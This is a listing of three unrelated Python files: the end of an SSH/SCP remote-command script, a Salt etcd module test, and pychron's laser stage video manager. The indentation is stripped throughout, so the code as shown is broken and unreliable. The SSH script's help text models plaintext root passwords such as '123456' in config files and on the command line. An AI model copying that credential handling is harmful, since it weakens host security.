result = stdout.read().decode()
error = stderr.read().decode()
print("+++++++++++++++++++++++start++++++++++++++++++++")
print("[connect success] | ip : %s" % ip)
print("result: \n %s"%result)
if error != " ":
print("error: \n %s"%error)
print("+++++++++++++++++++++++done++++++++++++++++++++")
if all([local_filename,remotepath]):
scpclient=SCPClient(ssh.get_transport(), socket_timeout=15.0)
scpclient.put(local_filename, remotepath)
if all([remote_filename,localpath]):
scpclient=SCPClient(ssh.get_transport(), socket_timeout=15.0)
scpclient.get(remote_filename,localpath)
ssh.close()
# read the host configuration file
def read_conf(config):
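# Parse the [hosts] section of the ini file; each entry has the form "id = ip,username,password".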
cf = configparser.ConfigParser()
filename = cf.read(config)
opt = cf.options("hosts")
host_list = []
for ooo in opt:
tmp_host = cf.get("hosts",ooo)
host_list.append(tmp_host.split(","))
return host_list
# run the connections concurrently using threads
def multi_thread(thread_target,args_lists):
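# Start one thread per host argument tuple and wait for all of them to finish.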
thread_list = []
for args_tuple in args_lists:
# each args_tuple is (ip, username, password, command, port, local_filename, remotepath, remote_filename, localpath)
thread = threading.Thread(target = thread_target, args = args_tuple)
thread_list.append(thread)
for tmp_argv in thread_list:
tmp_argv.start()
for tmp_argv in thread_list:
tmp_argv.join()
def main():
# initialize parameters
ip=""
username=""
password=""
config=""
conf=""
command=""
local_filename=""
remotepath=""
remote_filename=""
localpath=""
# parse command line options
opts,args = getopt.getopt(sys.argv[1:], "hH:U:P:f:c:p:u:g:d:", ["help","host=","username=","password=","conf=","command=","local_filename=","remotepath=","remote_filename=","localpath="])
for o,a in opts:
if o in ("-h", "--help") or not o:
print ('Usage:python3 remote_cmd.py [options]... ')
print ("""Script supports remote command execution, file upload and file download
The script supports remote command execution, file upload and file download;
the host can be a target or multiple hosts;
the single host uses the - H IP - U username - P password parameter;
the multiple hosts use the format of the configuration file host.ini;
the content of the host.ini file takes [host] as the first line,
the second line uses the format of id = IP, username, passwd.
Examples are as follows:
-H :host ip -H 192.168.11.11
-U :-U uername
-P :-P passwd
-f :config file; host.ini is formatted as follows
[hosts]
###hostname=ip,username,password
1 = 192.168.152.131,root,123456
2 = 192.168.152.132,autotest,123456
3 = 192.168.152.133,root,123456
4 = 192.168.152.134,root,123456
-c :command -c 'ls ~/'
-p :local filename -u :remote path
-g :remote filename -d :local path
Usage :python3 remote_cmd.py -f /home/host.ini -c 'pwd' #remote hosts execute command , the list of host in the host.ini
python3 remote_cmd.py -f /home/conf/host.ini -p test.py -u /home/autotest ##Upload files to remote host
python3 remote_cmd.py -H '192.168.152.131' -U 'autotest' -P 'qia' -g ~/Videos.tar -d /home/autotest/test/ ###get remote file download /home/autotest/tests
python3 remote_cmd.py -H '192.168.152.131' -U 'autotest' -P 'qia' -c 'pwd' ##remotehost execute command
""")
sys.exit()
if o in ("-H","--host"):
ip=a
# print(ip)
if o in ("-U","--username"):
username=a
# print(username)
if o in ("-P","--password"):
password=a
# print(password)
if o in ("-f","--conf"):
config=a
#print(config)
if o in ("-c","--command"):
command=a
#print(command)
if o in ("-p","--local_filename"):
local_filename=a
# print(local_filename)
if o in ("-u","--remotepath"):
remotepath=a
# print(remotepath)
if o in ("-g","--remote_filename"):
remote_filename=a
#print(remote_filename)
if o in ("-d","--localpath"):
localpath=a
# print(localpath)
# decide whether hosts come from the command line arguments or from the config file
host_list=[]
if all([ip,username,password]) and not config:
host_list=[(ip,username,password)]
elif config:
host_list=read_conf(config)
args_lists=[]
if not host_list:
print("Usage:python3 remote_cmd.py -h")
for ip,username,password in host_list:
args_lists.append([ip.strip(),username.strip(),password.strip(),command,22,local_filename,remotepath,remote_filename,localpath])
multi_thread(getConnection,args_lists)
if __name__ == "__main__":
main()
|
test_etcd_mod.py
|
import logging
import threading
import time
import pytest
import salt.modules.etcd_mod as etcd_mod
from salt.utils.etcd_util import get_conn
from tests.support.pytest.etcd import * # pylint: disable=wildcard-import,unused-wildcard-import
docker = pytest.importorskip("docker")
log = logging.getLogger(__name__)
pytestmark = [
pytest.mark.windows_whitelisted,
pytest.mark.skip_if_binaries_missing("docker", "dockerd", check_all=False),
]
@pytest.fixture
def configure_loader_modules(minion_opts):
return {
etcd_mod: {
"__opts__": minion_opts,
"__utils__": {
"etcd_util.get_conn": get_conn,
},
},
}
@pytest.fixture(scope="module")
def minion_config_overrides(etcd_profile):
return etcd_profile
@pytest.fixture(scope="module")
def etcd_client(minion_opts, profile_name):
return get_conn(minion_opts, profile=profile_name)
@pytest.fixture(scope="module")
def prefix():
return "/salt/util/test"
@pytest.fixture(autouse=True)
def cleanup_prefixed_entries(etcd_client, prefix):
"""
Cleanup after each test to ensure a consistent starting state.
"""
try:
assert etcd_client.get(prefix, recurse=True) is None
yield
finally:
etcd_client.delete(prefix, recurse=True)
def test_basic_operations(subtests, profile_name, prefix):
"""
Make sure we can do the basics
"""
with subtests.test("There should be no entries at the start with our prefix."):
assert etcd_mod.get_(prefix, recurse=True, profile=profile_name) is None
with subtests.test("We should be able to set and retrieve simple values"):
etcd_mod.set_("{}/1".format(prefix), "one", profile=profile_name)
assert (
etcd_mod.get_("{}/1".format(prefix), recurse=False, profile=profile_name)
== "one"
)
with subtests.test("We should be able to update and retrieve those values"):
updated = {
"1": "not one",
"2": {
"3": "two-three",
"4": "two-four",
},
}
etcd_mod.update(updated, path=prefix, profile=profile_name)
assert etcd_mod.get_(prefix, recurse=True, profile=profile_name) == updated
with subtests.test("We should be list all top level values at a directory"):
expected = {
prefix: {
"{}/1".format(prefix): "not one",
"{}/2/".format(prefix): {},
},
}
assert etcd_mod.ls_(path=prefix, profile=profile_name) == expected
with subtests.test("We should be able to remove values and get a tree hierarchy"):
updated = {
"2": {
"3": "two-three",
"4": "two-four",
},
}
etcd_mod.rm_("{}/1".format(prefix), profile=profile_name)
assert etcd_mod.tree(path=prefix, profile=profile_name) == updated
with subtests.test("updates should be able to be caught by waiting in read"):
return_list = []
def wait_func(return_list):
return_list.append(
etcd_mod.watch("{}/1".format(prefix), timeout=30, profile=profile_name)
)
wait_thread = threading.Thread(target=wait_func, args=(return_list,))
wait_thread.start()
time.sleep(1)
etcd_mod.set_("{}/1".format(prefix), "one", profile=profile_name)
wait_thread.join()
modified = return_list.pop()
assert modified["key"] == "{}/1".format(prefix)
assert modified["value"] == "one"
def test_with_missing_profile(subtests, prefix, etcd_version, etcd_port):
"""
Test the correct response when the profile is missing and we can't connect
"""
if etcd_version in (EtcdVersion.v2, EtcdVersion.v3_v2_mode) and etcd_port != 2379:
# Only need to run this once
with subtests.test("Test no profile and bad connection in get_"):
assert etcd_mod.get_("{}/1".format(prefix)) is None
with subtests.test("Test no profile and bad connection in set_"):
assert etcd_mod.set_("{}/1".format(prefix), "lol") is None
with subtests.test("Test no profile and bad connection in update"):
assert etcd_mod.update({"{}/1".format(prefix): "SIUUU"}) is None
with subtests.test("Test no profile and bad connection in watch"):
assert etcd_mod.watch("{}/1".format(prefix)) is None
with subtests.test("Test no profile and bad connection in ls_"):
assert etcd_mod.ls_() is None
with subtests.test("Test no profile and bad connection in rm"):
assert etcd_mod.rm_("{}/1".format(prefix)) is None
with subtests.test("Test no profile and bad connection in tree"):
assert etcd_mod.tree() is None
|
video_stage_manager.py
|
# ===============================================================================
# Copyright 2011 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from traits.api import Instance, String, Property, Button, Bool, Event, on_trait_change, Str, Float, Enum, Int
from apptools.preferences.preference_binding import bind_preference
from skimage.color import gray2rgb
from skimage.draw import circle_perimeter, line
import yaml
import os
import shutil
import time
from threading import Timer, Event as TEvent
from numpy import copy
from pychron.core.ui.thread import sleep
from pychron.canvas.canvas2D.camera import Camera, YamlCamera, BaseCamera
from pychron.core.helpers.binpack import pack, encode_blob
from pychron.core.helpers.filetools import unique_path, unique_path_from_manifest
from pychron.core.ui.stage_component_editor import VideoComponentEditor
from pychron.image.video import Video, pil_save
from pychron.mv.lumen_detector import LumenDetector
from pychron.paths import paths
from .stage_manager import StageManager
from pychron.core.ui.thread import Thread as QThread
try:
from pychron.canvas.canvas2D.video_laser_tray_canvas import \
VideoLaserTrayCanvas
except ImportError:
from pychron.canvas.canvas2D.laser_tray_canvas import \
LaserTrayCanvas as VideoLaserTrayCanvas
class VideoStageManager(StageManager):
"""
"""
video = Instance(Video)
camera = Instance(BaseCamera)
canvas_editor_klass = VideoComponentEditor
camera_zoom_coefficients = Property(String(enter_set=True, auto_set=False),
depends_on='_camera_zoom_coefficients')
_camera_zoom_coefficients = String
use_auto_center_interpolation = Bool(False)
configure_camera_device_button = Button
autocenter_button = Button('AutoCenter')
configure_autocenter_button = Button('Configure')
autocenter_manager = Instance(
'pychron.mv.autocenter_manager.AutoCenterManager')
autofocus_manager = Instance(
'pychron.mv.focus.autofocus_manager.AutoFocusManager')
# zoom_calibration_manager = Instance(
# 'pychron.mv.zoom.zoom_calibration.ZoomCalibrationManager')
snapshot_button = Button('Snapshot')
snapshot_mode = Enum('Single', '3 Burst', '10 Burst')
auto_save_snapshot = Bool(True)
record = Event
record_label = Property(depends_on='is_recording')
is_recording = Bool
use_db = False
use_video_archiver = Bool(True)
video_archiver = Instance('pychron.core.helpers.archiver.Archiver')
video_identifier = Str
# use_video_server = Bool(False)
# video_server_port = Int
# video_server_quality = Int
# video_server = Instance('pychron.image.video_server.VideoServer')
use_media_storage = Bool(False)
auto_upload = Bool(False)
keep_local_copy = Bool(False)
lumen_detector = Instance(LumenDetector)
render_with_markup = Bool(False)
burst_delay = Int(250)
_auto_correcting = False
stop_timer = Event
pxpermm = Float(23)
_measure_grain_t = None
_measure_grain_evt = None
grain_polygons = None
# test_button = Button
# _test_state = False
# def _test_button_fired(self):
# if self._test_state:
# # self.stop_measure_grain_polygon()
# #
# # time.sleep(2)
# #
# # d = self.get_grain_polygon_blob()
# # print d
# self.parent.disable_laser()
# else:
# self.parent.luminosity_degas_test()
# # self.start_measure_grain_polygon()
# self._test_state = not self._test_state
def motor_event_hook(self, name, value, *args, **kw):
if name == 'zoom':
self._update_zoom(value)
def bind_preferences(self, pref_id):
self.debug('binding preferences')
super(VideoStageManager, self).bind_preferences(pref_id)
if self.autocenter_manager:
self.autocenter_manager.bind_preferences(pref_id)
# bind_preference(self.autocenter_manager, 'use_autocenter',
# '{}.use_autocenter'.format(pref_id))
bind_preference(self, 'render_with_markup',
'{}.render_with_markup'.format(pref_id))
bind_preference(self, 'burst_delay',
'{}.burst_delay'.format(pref_id))
bind_preference(self, 'auto_upload', '{}.auto_upload'.format(pref_id))
bind_preference(self, 'use_media_storage', '{}.use_media_storage'.format(pref_id))
bind_preference(self, 'keep_local_copy', '{}.keep_local_copy'.format(pref_id))
bind_preference(self, 'use_video_archiver',
'{}.use_video_archiver'.format(pref_id))
bind_preference(self, 'video_identifier',
'{}.video_identifier'.format(pref_id))
bind_preference(self, 'use_video_server',
'{}.use_video_server'.format(pref_id))
bind_preference(self.video_archiver, 'archive_months',
'{}.video_archive_months'.format(pref_id))
bind_preference(self.video_archiver, 'archive_days',
'{}.video_archive_days'.format(pref_id))
bind_preference(self.video_archiver, 'archive_hours',
'{}.video_archive_hours'.format(pref_id))
bind_preference(self.video_archiver, 'root',
'{}.video_directory'.format(pref_id))
# bind_preference(self.video, 'output_mode',
# '{}.video_output_mode'.format(pref_id))
# bind_preference(self.video, 'ffmpeg_path',
# '{}.ffmpeg_path'.format(pref_id))
def get_grain_polygon(self):
ld = self.lumen_detector
l, m = ld.lum()
return m.tostring()
def get_grain_polygon_blob(self):
# self.debug('Get grain polygons n={}'.format(len(self.grain_polygons)))
try:
t, md, p = next(self.grain_polygons)
a = pack('ff', ((t, md),))
b = pack('HH', p)
return encode_blob(a + b)
except (StopIteration, TypeError) as e:
self.debug('No more grain polygons. {}'.format(e))
def stop_measure_grain_polygon(self):
self.debug('Stop measure polygons {}'.format(self._measure_grain_evt))
if self._measure_grain_evt:
self._measure_grain_evt.set()
return True
def start_measure_grain_polygon(self):
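# Spawn a background thread that repeatedly grabs preprocessed frames and collects
# grain polygon targets until stop_measure_grain_polygon() sets the stop event.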
self._measure_grain_evt = evt = TEvent()
def _measure_grain_polygon():
ld = self.lumen_detector
dim = self.stage_map.g_dimension
ld.pxpermm = self.pxpermm
self.debug('Starting measure grain polygon')
masks = []
display_image = self.autocenter_manager.display_image
mask_dim = dim * 1.05
mask_dim_mm = mask_dim * self.pxpermm
ld.grain_measuring = True
while not evt.is_set():
src = self._get_preprocessed_src()
if src is not None:
targets = ld.find_targets(display_image, src, dim, mask=mask_dim,
search={'start_offset_scalar': 1})
if targets:
t = time.time()
targets = [(t, mask_dim_mm, ti.poly_points.tolist()) for ti in targets]
masks.extend(targets)
sleep(0.1)
ld.grain_measuring = False
self.grain_polygons = (m for m in masks)
self.debug('exiting measure grain')
self._measure_grain_t = QThread(target=_measure_grain_polygon)
self._measure_grain_t.start()
return True
def start_recording(self, path=None, use_dialog=False, basename='vm_recording', **kw):
"""
"""
directory = None
if os.path.sep in basename:
args = os.path.split(basename)
directory, basename = os.path.sep.join(args[:-1]), args[-1]
if path is None:
if use_dialog:
path = self.save_file_dialog()
else:
vd = self.video_archiver.root
self.debug('video archiver root {}'.format(vd))
if not vd:
vd = paths.video_dir
if directory:
vd = os.path.join(vd, directory)
if not os.path.isdir(vd):
os.mkdir(vd)
path = unique_path_from_manifest(vd, basename, extension='avi')
kw['path'] = path
kw['basename'] = basename
self._start_recording(**kw)
self.is_recording = True
return path
def stop_recording(self, user='remote', delay=None):
"""
"""
def close():
self.is_recording = False
self.info('stop video recording')
p = self.video.output_path
if self.video.stop_recording(wait=True):
if self.auto_upload:
try:
p = self._upload(p, inform=False)
except BaseException as e:
self.critical('Failed uploading {}. error={}'.format(p, e))
return p
if self.video.is_recording():
if delay:
t = Timer(delay, close)
t.start()
else:
return close()
@property
def video_configuration_path(self):
if self.configuration_dir_path:
return os.path.join(self.configuration_dir_path, 'camera.yaml')
def initialize_video(self):
if self.video:
identifier = 0
p = self.video_configuration_path
if os.path.isfile(p):
with open(p, 'r') as rfile:
yd = yaml.load(rfile, Loader=yaml.SafeLoader)
vid = yd['Device']
identifier = vid.get('identifier', 0)
self.video.open(identifier=identifier)
self.video.load_configuration(p)
self.lumen_detector.pixel_depth = self.video.pixel_depth
def initialize_stage(self):
super(VideoStageManager, self).initialize_stage()
self.initialize_video()
# s = self.stage_controller
# if s.axes:
# xa = s.axes['x'].drive_ratio
# ya = s.axes['y'].drive_ratio
# self._drive_xratio = xa
# self._drive_yratio = ya
self._update_zoom(0)
def autocenter(self, *args, **kw):
return self._autocenter(*args, **kw)
def snapshot(self, path=None, name=None, auto=False, inform=True, return_blob=False,
pic_format='.jpg', include_raw=True):
"""
path: abs path to use
name: base name to use if auto saving in default dir
auto: force auto save
returns:
path: local abs path
upath: remote abs path
"""
if path is None:
if self.auto_save_snapshot or auto:
if name is None:
name = 'snapshot'
path = unique_path_from_manifest(paths.snapshot_dir, name, pic_format)
elif name is not None:
if not os.path.isdir(os.path.dirname(name)):
path = unique_path_from_manifest(paths.snapshot_dir, name, pic_format)
else:
path = name
else:
path = self.save_file_dialog()
if path:
self.info('saving snapshot {}'.format(path))
# play camera shutter sound
# play_sound('shutter')
if include_raw:
frame = self.video.get_cached_frame()
head, _ = os.path.splitext(path)
raw_path = '{}.tif'.format(head)
pil_save(frame, raw_path)
self._render_snapshot(path)
if self.auto_upload:
if include_raw:
self._upload(raw_path)
upath = self._upload(path, inform=inform)
if upath is None:
upath = ''
if inform:
if self.keep_local_copy:
self.information_dialog('Snapshot saved: "{}".\nUploaded : "{}"'.format(path, upath))
else:
self.information_dialog('Snapshot uploaded to "{}"'.format(upath))
else:
upath = None
if inform:
self.information_dialog('Snapshot saved to "{}"'.format(path))
if return_blob:
with open(path, 'rb') as rfile:
im = rfile.read()
return path, upath, im
else:
return path, upath
def kill(self):
"""
"""
super(VideoStageManager, self).kill()
if self.camera:
self.camera.save_calibration()
self.stop_timer = True
self.canvas.close_video()
if self.video:
self.video.close(force=True)
# if self.use_video_server:
# self.video_server.stop()
# if self._stage_maps:
# for s in self._stage_maps:
# s.dump_correction_file()
self.clean_video_archive()
def clean_video_archive(self):
if self.use_video_archiver:
self.info('Cleaning video directory')
self.video_archiver.clean(('manifest.yaml',))
def is_auto_correcting(self):
return self._auto_correcting
crop_width = 5
crop_height = 5
def get_scores(self, **kw):
ld = self.lumen_detector
src = self._get_preprocessed_src()
return ld.get_scores(src, **kw)
def find_lum_peak(self, min_distance, blur, **kw):
ld = self.lumen_detector
src = self._get_preprocessed_src()
dim = self.stage_map.g_dimension
mask_dim = dim * 1.05
# mask_dim_mm = mask_dim * self.pxpermm
if src is not None and src.ndim >= 2:
return ld.find_lum_peak(src, dim, mask_dim,
blur=blur,
min_distance=min_distance, **kw)
def get_brightness(self, **kw):
ld = self.lumen_detector
src = self._get_preprocessed_src()
dim = self.stage_map.g_dimension
return ld.get_value(src, dim, **kw)
# src = self.video.get_cached_frame()
# csrc = copy(src)
# src, v = ld.get_value(csrc, **kw)
# return csrc, src, v
def get_frame_size(self):
cw = 2 * self.crop_width * self.pxpermm
ch = 2 * self.crop_height * self.pxpermm
return cw, ch
def close_open_images(self):
if self.autocenter_manager:
self.autocenter_manager.close_open_images()
def finish_move_to_hole(self, user_entry):
self.debug('finish move to hole')
# if user_entry and not self.keep_images_open:
# self.close_open_images()
def get_preprocessed_src(self):
return self._get_preprocessed_src()
# private
def _get_preprocessed_src(self):
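# Crop the cached video frame to a region around the current hole (using the canvas
# screen offset) so the lumen detector only sees the region of interest.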
ld = self.lumen_detector
src = copy(self.video.get_cached_frame())
dim = self.stage_map.g_dimension
ld.pxpermm = self.pxpermm
offx, offy = self.canvas.get_screen_offset()
cropdim = dim * 2.5
if src is not None:
if len(src.shape):
src = ld.crop(src, cropdim, cropdim, offx, offy, verbose=False)
return src
def _stage_map_changed_hook(self):
self.lumen_detector.hole_radius = self.stage_map.g_dimension
def _upload(self, src, inform=True):
if not self.use_media_storage:
msg = 'Use Media Storage not enabled in Laser preferences'
if inform:
self.warning_dialog(msg)
else:
self.warning(msg)
else:
srv = 'pychron.media_storage.manager.MediaStorageManager'
msm = self.parent.application.get_service(srv)
if msm is not None:
d = os.path.split(os.path.dirname(src))[-1]
dest = os.path.join(self.parent.name, d,
os.path.basename(src))
msm.put(src, dest)
if not self.keep_local_copy:
self.debug('removing {}'.format(src))
if src.endswith('.avi'):
head, ext = os.path.splitext(src)
vd = '{}-images'.format(head)
self.debug('removing video build directory {}'.format(vd))
shutil.rmtree(vd)
os.remove(src)
dest = '{}/{}'.format(msm.get_base_url(), dest)
return dest
else:
msg = 'Media Storage Plugin not enabled'
if inform:
self.warning_dialog(msg)
else:
self.warning(msg)
def _render_snapshot(self, path):
from chaco.plot_graphics_context import PlotGraphicsContext
c = self.canvas
p = None
was_visible = False
if not self.render_with_markup:
p = c.show_laser_position
c.show_laser_position = False
if self.points_programmer.is_visible:
c.hide_all()
was_visible = True
gc = PlotGraphicsContext((int(c.outer_width), int(c.outer_height)))
c.do_layout()
gc.render_component(c)
# gc.save(path)
from pychron.core.helpers import save_gc
save_gc.save(gc, path)
if p is not None:
c.show_laser_position = p
if was_visible:
c.show_all()
def _start_recording(self, path, basename):
self.info('start video recording {}'.format(path))
d = os.path.dirname(path)
if not os.path.isdir(d):
self.warning('invalid directory {}'.format(d))
self.warning('using default directory')
path, _ = unique_path(paths.video_dir, basename,
extension='avi')
self.info('saving recording to path {}'.format(path))
# if self.use_db:
# db = self.get_video_database()
# db.connect()
#
# v = db.add_video_record(rid=basename)
# db.add_path(v, path)
# self.info('saving {} to database'.format(basename))
# db.commit()
video = self.video
crop_to_hole = True
dim = self.stage_map.g_dimension
cropdim = dim * 8 * self.pxpermm
color = self.canvas.crosshairs_color.getRgb()[:3]
r = int(self.canvas.get_crosshairs_radius() * self.pxpermm)
# offx, offy = self.canvas.get_screen_offset()
def renderer(p):
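# Called for every recorded frame: crop to the hole region and, when render_with_markup
# is enabled, draw the crosshairs before saving the frame to disk.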
# cw, ch = self.get_frame_size()
frame = video.get_cached_frame()
if frame is not None:
if not len(frame.shape):
return
frame = copy(frame)
# ch, cw, _ = frame.shape
# ch, cw = int(ch), int(cw)
if crop_to_hole:
frame = video.crop(frame, 0, 0, cropdim, cropdim)
if self.render_with_markup:
# draw crosshairs
if len(frame.shape) == 2:
frame = gray2rgb(frame)
ch, cw, _ = frame.shape
ch, cw = int(ch), int(cw)
y = ch // 2
x = cw // 2
cp = circle_perimeter(y, x, r, shape=(ch, cw))
frame[cp] = color
frame[line(y, 0, y, x - r)] = color # left
frame[line(y, x + r, y, int(cw) - 1)] = color # right
frame[line(0, x, y - r, x)] = color # bottom
frame[line(y + r, x, int(ch) - 1, x)] = color # top
if frame is not None:
pil_save(frame, p)
self.video.start_recording(path, renderer)
def _move_to_hole_hook(self, holenum, correct, autocentered_position):
args = holenum, correct, autocentered_position
self.debug('move to hole hook holenum={}, '
'correct={}, autocentered_position={}'.format(*args))
if correct:
ntries = 1 if autocentered_position else 3
self._auto_correcting = True
try:
self._autocenter(holenum=holenum, ntries=ntries, save=True)
except BaseException as e:
self.critical('Autocentering failed. {}'.format(e))
self._auto_correcting = False
# def find_center(self):
# ox, oy = self.canvas.get_screen_offset()
# rpos, src = self.autocenter_manager.calculate_new_center(
# self.stage_controller.x,
# self.stage_controller.y,
# ox, oy,
# dim=self.stage_map.g_dimension, open_image=False)
#
# return rpos, src
# def find_target(self):
# if self.video:
# ox, oy = self.canvas.get_screen_offset()
# src = self.video.get_cached_frame()
#
# ch = cw = self.pxpermm * self.stage_map.g_dimension * 2.5
# src = self.video.crop(src, ox, oy, cw, ch)
# return self.lumen_detector.find_target(src)
#
# def find_best_target(self):
# if self.video:
# src = self.video.get_cached_frame()
# src = self.autocenter_manager.crop(src)
# return self.lumen_detector.find_best_target(src)
def _autocenter(self, holenum=None, ntries=3, save=False, inform=False):
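# Use machine vision to measure the positioning error for the current hole and iteratively
# re-center the stage, optionally saving the resulting correction to the stage map.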
self.debug('do autocenter')
rpos = None
interp = False
sm = self.stage_map
st = time.time()
if self.autocenter_manager.use_autocenter:
time.sleep(0.1)
dim = sm.g_dimension
shape = sm.g_shape
if holenum is not None:
hole = sm.get_hole(holenum)
if hole is not None:
dim = hole.dimension
shape = hole.shape
ox, oy = self.canvas.get_screen_offset()
for ti in range(max(1, ntries)):
# use machine vision to calculate positioning error
rpos = self.autocenter_manager.calculate_new_center(
self.stage_controller.x,
self.stage_controller.y,
ox, oy,
dim=dim,
shape=shape)
if rpos is not None:
self.linear_move(*rpos, block=True,
source='autocenter',
use_calibration=False,
update_hole=False,
velocity_scalar=0.1)
time.sleep(0.1)
else:
self.snapshot(auto=True,
name='pos_err_{}_{}'.format(holenum, ti),
inform=inform)
break
# if use_interpolation and rpos is None:
# self.info('trying to get interpolated position')
# rpos = sm.get_interpolated_position(holenum)
# if rpos:
# s = '{:0.3f},{:0.3f}'
# interp = True
# else:
# s = 'None'
# self.info('interpolated position= {}'.format(s))
if rpos:
corrected = True
# add an adjustment value to the stage map
if save and holenum is not None:
sm.set_hole_correction(holenum, *rpos)
sm.dump_correction_file()
# f = 'interpolation' if interp else 'correction'
else:
# f = 'uncorrected'
corrected = False
if holenum is not None:
hole = sm.get_hole(holenum)
if hole:
rpos = hole.nominal_position
self.debug('Autocenter duration ={}'.format(time.time() - st))
return rpos, corrected, interp
# ===============================================================================
# views
# ===============================================================================
# ===============================================================================
# view groups
# ===============================================================================
# ===============================================================================
# handlers
# ===============================================================================
def _configure_camera_device_button_fired(self):
if self.video:
self.video.load_configuration(self.video_configuration_path)
if hasattr(self.video.cap, 'reload_configuration'):
self.video.cap.reload_configuration(self.video_configuration_path)
self.lumen_detector.pixel_depth = self.video.pixel_depth
def _update_zoom(self, v):
if self.camera:
self._update_xy_limits()
@on_trait_change('parent:motor_event')
def _update_motor(self, new):
print('motor event', new, self.canvas, self.canvas.camera)
# s = self.stage_controller
if self.camera:
if not isinstance(new, (int, float)):
args, _ = new
name, v = args[:2]
else:
name = 'zoom'
v = new
if name == 'zoom':
self._update_xy_limits()
# pxpermm = self.canvas.camera.set_limits_by_zoom(v, s.x, s.y)
# self.pxpermm = pxpermm
elif name == 'beam':
self.lumen_detector.beam_radius = v / 2.0
def _pxpermm_changed(self, new):
if self.autocenter_manager:
self.autocenter_manager.pxpermm = new
self.lumen_detector.pxpermm = new
# self.lumen_detector.mask_radius = new*self.stage_map.g_dimension
def _autocenter_button_fired(self):
self.goto_position(self.calibrated_position_entry, autocenter_only=True)
# def _configure_autocenter_button_fired(self):
# info = self.autocenter_manager.edit_traits(view='configure_view',
# kind='livemodal')
# if info.result:
# self.autocenter_manager.dump_detector()
def _snapshot_button_fired(self):
n = 1
if self.snapshot_mode == '3 Burst':
n = 3
elif self.snapshot_mode == '10 Burst':
n = 10
bd = self.burst_delay * 0.001
delay = n > 1
for i in range(n):
st = time.time()
self.snapshot(inform=False)
if delay:
time.sleep(max(0, bd - time.time() + st))
def _record_fired(self):
# time.sleep(4)
# self.stop_recording()
if self.is_recording:
self.stop_recording()
else:
self.start_recording()
def _use_video_server_changed(self):
if self.use_video_server:
self.video_server.start()
else:
self.video_server.stop()
def _get_camera_zoom_coefficients(self):
return self.camera.zoom_coefficients
def _set_camera_zoom_coefficients(self, v):
self.camera.zoom_coefficients = ','.join(map(str, v))
self._update_xy_limits()
def _validate_camera_zoom_coefficients(self, v):
try:
return list(map(float, v.split(',')))
except ValueError:
pass
def _update_xy_limits(self):
z = 0
if self.parent is not None:
zoom = self.parent.get_motor('zoom')
if zoom is not None:
z = zoom.data_position
x = self.stage_controller.get_current_position('x')
y = self.stage_controller.get_current_position('y')
if self.camera:
pxpermm = self.camera.set_limits_by_zoom(z, x, y, self.canvas)
self.pxpermm = pxpermm
self.debug('updated xy limits zoom={}, pxpermm={}'.format(z, pxpermm))
self.canvas.request_redraw()
def _get_record_label(self):
return 'Start Recording' if not self.is_recording else 'Stop'
# ===============================================================================
# factories
# ===============================================================================
def _canvas_factory(self):
"""
"""
v = VideoLaserTrayCanvas(stage_manager=self,
padding=30)
return v
def _canvas_editor_factory(self):
e = super(VideoStageManager, self)._canvas_editor_factory()
e.stop_timer = 'stop_timer'
return e
# ===============================================================================
# defaults
# ===============================================================================
def _camera_default(self):
klass = YamlCamera
# p = os.path.join(self.configuration_dir_path, 'camera.yaml')
p = self.video_configuration_path
if p is not None:
if not os.path.isfile(p):
klass = Camera
pp = os.path.join(self.configuration_dir_path, 'camera.cfg')
if not os.path.isfile(pp):
self.warning_dialog('No camera configuration file at {} or {}'.format(p, pp))
p = pp
camera = klass()
camera.load(p)
else:
camera = Camera()
camera.set_limits_by_zoom(0, 0, 0, self.canvas)
self._camera_zoom_coefficients = camera.zoom_coefficients
return camera
def _lumen_detector_default(self):
ld = LumenDetector()
ld.pixel_depth = self.video.pixel_depth
return ld
def _video_default(self):
v = Video()
self.canvas.video = v
return v
def _video_server_default(self):
from pychron.image.video_server import VideoServer
return VideoServer(video=self.video)
def _video_archiver_default(self):
from pychron.core.helpers.archiver import Archiver
return Archiver()
def _autocenter_manager_default(self):
if self.parent.mode != 'client':
# from pychron.mv.autocenter_manager import AutoCenterManager
if 'co2' in self.parent.name.lower():
from pychron.mv.autocenter_manager import CO2AutocenterManager
klass = CO2AutocenterManager
else:
from pychron.mv.autocenter_manager import DiodeAutocenterManager
klass = DiodeAutocenterManager
return klass(video=self.video,
canvas=self.canvas,
application=self.application)
def _autofocus_manager_default(self):
if self.parent.mode != 'client':
from pychron.mv.focus.autofocus_manager import AutoFocusManager
return AutoFocusManager(video=self.video,
laser_manager=self.parent,
stage_controller=self.stage_controller,
canvas=self.canvas,
application=self.application)
# def _zoom_calibration_manager_default(self):
# if self.parent.mode != 'client':
# from pychron.mv.zoom.zoom_calibration import ZoomCalibrationManager
# return ZoomCalibrationManager(laser_manager=self.parent)
# ===============================================================================
# calculate camera parameters
# ===============================================================================
# def _calculate_indicator_positions(self, shift=None):
# ccm = self.camera_calibration_manager
#
# zoom = self.parent.zoom
# pychron, name = self.video_manager.snapshot(identifier=zoom)
# ccm.image_factory(pychron=pychron)
#
# ccm.process_image()
# ccm.title = name
#
# cond = Condition()
# ccm.cond = cond
# cond.acquire()
# do_later(ccm.edit_traits, view='snapshot_view')
# if shift:
# self.stage_controller.linear_move(*shift, block=False)
#
# cond.wait()
# cond.release()
#
# def _calculate_camera_parameters(self):
# ccm = self.camera_calibration_manager
# self._calculate_indicator_positions()
# if ccm.result:
# if self.calculate_offsets:
# rdxmm = 5
# rdymm = 5
#
# x = self.stage_controller.x + rdxmm
# y = self.stage_controller.y + rdymm
# self.stage_controller.linear_move(x, y, block=True)
#
# time.sleep(2)
#
# polygons1 = ccm.polygons
# x = self.stage_controller.x - rdxmm
# y = self.stage_controller.y - rdymm
# self._calculate_indicator_positions(shift=(x, y))
#
# polygons2 = ccm.polygons
#
# # compare polygon sets
# # calculate pixel displacement
# dxpx = sum([sum([(pts1.x - pts2.x)
# for pts1, pts2 in zip(p1.points, p2.points)]) / len(p1.points)
# for p1, p2 in zip(polygons1, polygons2)]) / len(polygons1)
# dypx = sum([sum([(pts1.y - pts2.y)
# for pts1, pts2 in zip(p1.points, p2.points)]) / len(p1.points)
# for p1, p2 in zip(polygons1, polygons2)]) / len(polygons1)
